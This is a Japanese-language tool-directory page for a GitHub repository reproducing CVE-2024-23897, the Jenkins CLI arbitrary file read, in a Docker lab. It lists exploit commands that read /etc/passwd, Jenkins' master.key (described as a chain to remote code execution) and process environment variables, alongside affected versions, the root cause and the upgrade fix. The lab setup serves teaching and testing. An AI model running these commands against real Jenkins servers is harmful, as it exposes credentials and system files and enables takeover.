Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-23897 | Kitploit
ツール/GitHubGitHub/dungsocool/cve-2024-23897
脆弱性スキャナーエクスプロイトウェブセキュリティ学習と教育ラボと実践
GitHubdungsocool/cve-2024-23897

CVE-2024-23897

リポジトリを見る
1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-23897 — Jenkins CLI の任意ファイル読み取り

クイックスタート

root@kitploit:~
# 1. Start lab
docker-compose up -d

# 2. Wait ~30s, then download CLI tool
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar

# 3. Exploit — read /etc/passwd (full file)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd

# 4. Read master.key (chain to RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key

# 5. Read environment variables
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ

詳細

完全な技術分析(ベトナム語)は REPORT.md を参照してください。

項目値
CVSS9.8(緊急)
影響を受けるバージョンJenkins <= 2.441、LTS <= 2.426.2
ラボのバージョンjenkins/jenkins:2.426.2-lts
根本原因args4j の expandAtFiles がサーバーサイドCLIで有効になっている
修正Jenkins >= 2.442 / LTS >= 2.426.3 にアップグレード

クリーンアップ

root@kitploit:~
docker-compose down -v --remove-orphans
ツールをダウンロード